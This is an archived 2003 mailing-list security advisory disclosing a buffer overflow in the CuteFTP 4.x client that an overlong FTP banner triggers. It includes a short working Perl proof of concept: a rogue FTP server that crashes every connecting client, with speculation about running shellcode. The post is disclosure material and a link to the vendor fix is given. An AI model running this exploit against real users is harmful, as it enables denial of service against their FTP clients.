[VulnWatch] CuteFTP: buffer overflow

From: D4rkGr3y (grey_1999@mail.ru)
Date: 01/04/03

  • Next message: D4rkGr3y: "[VulnWatch] EServ/2.97 remote DoS"
    Date: Sat, 4 Jan 2003 05:01:26 -0800
    From: D4rkGr3y <grey_1999@mail.ru>
    To: bugtraq@securityfocus.com, submissions@packetstormsecurity.com, vulnwatch@vulnwatch.org
    
    

    #####################################################*
    # Damage Hacking Group security advisory
    # www.dhgroup.org
    #####################################################*
    #Product: CuteFTP client
    #Authors: GlobalSCAPE Inc. [www.globalscape.com]
    #Vulnerable versions: v.4.*
    #Vulnerability: buffer overflow
    #####################################################*

    #Overview#--------------------------------------------------------------#
    "CuteFTP is a Windows based File Transfer Protocol (FTP) client that
    allows users to utilize the capabilities of FTP without having to
    know all the details of the protocol itself. CuteFTP simplifies FTP
    by offering a user-friendly Windows interface instead of a cumbersome
    command line utility. CuteFTP gives novice PC users the ability to
    upload, download and edit files on remote FTP servers around the world."

    #Problem#---------------------------------------------------------------#
    It's possible to crash CuteFTP (and run shellcode(?)) by sending
    long (>2048b) ftp-banner to it. As u understand, this problem could
    be used by FTP server.

    #Fix#--------------------------------------------------------------------#
    Download new verion from www.globalscape.com.

    #Exploit#----------------------------------------------------------------#

    #!/usr/bin/perl
    ######################################################
    #Here is an example of ftp-server. It will freeze each
    #CuteFTP-user, that try to connect to it.
    #######################################################
    use IO::Socket;
    $port = "21";
    $data = "a";
    $num = "2049";
    $buf .= $data x $num;
    $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2)
    or die "Couldn't create tcp-server.\n";
    while ($client = $server->accept()) {
     print "Client connected.\n";
     print "Attacking...";
     print $client "$buf";
     print "OK\n";
     close($client);
    }
    #EOF

    Best regards www.dhgroup.org
      D4rkGr3y icq 540981



    Relevant Pages

    • Re: Cant connect to FTP servers with Firewall activited in SP2
      ... You may not be able to open a project when you try to connect to a remote Windows XP ... Service Pack 2-based computer by using the AutoCAD FTP service ... SP2 firewall Exceptions tab: ... | - Switched to PASV mode in CuteFTP ...
      (microsoft.public.windowsxp.general)
    • Re: Cant connect to FTP servers with Firewall activited in SP2
      ... You may not be able to open a project when you try to connect to a remote Windows XP ... Service Pack 2-based computer by using the AutoCAD FTP service ... SP2 firewall Exceptions tab: ... | - Switched to PASV mode in CuteFTP ...
      (microsoft.public.windowsxp.help_and_support)
    • [NT] CuteFTP Banner Buffer Overflow
      ... CuteFTP is a Windows based File Transfer ... Protocol (FTP) client that allows users to utilize the capabilities of FTP ... the client to crash by sending it a large banner. ...
      (Securiteam)
    • CuteFTP: buffer overflow
      ... "CuteFTP is a Windows based File Transfer Protocol client that ... allows users to utilize the capabilities of FTP without having to ... by offering a user-friendly Windows interface instead of a cumbersome ...
      (Bugtraq)
    • IIS 5.0 ftp and transfer resumes
      ... I could use CuteFtp to connect to my computer from ... work and hit my ftp to send stuff back and forth, ... the server or client end? ...
      (microsoft.public.inetserver.iis.security)